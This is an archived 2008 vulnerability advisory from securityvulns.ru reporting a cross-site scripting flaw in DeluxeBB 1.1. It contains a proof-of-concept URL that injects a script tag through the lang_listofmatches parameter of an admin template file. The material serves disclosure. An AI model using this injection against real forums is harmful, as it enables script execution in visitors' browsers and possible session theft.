Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PacerCMS Multiple Vulnerabilities (XSS/SQL)

From:nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date:22.01.2008
Subject:DeluxeBB 1.1 XSS Vulnerabilitie

########################################################
#Founded: 21, January 2008                             
#Autor: NBBN                                           
#Type: XSS                                             
#DeluxeBB Version: 1.1                                 
#Register Globals: ON                                  
#Magic Quotes; OFF                                     
########################################################

poc:

http://www.site.tld/path/templates/default/admincp/attachments_header.php?lang_li
stofmatches=
<script>alert("XSS")</script>

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server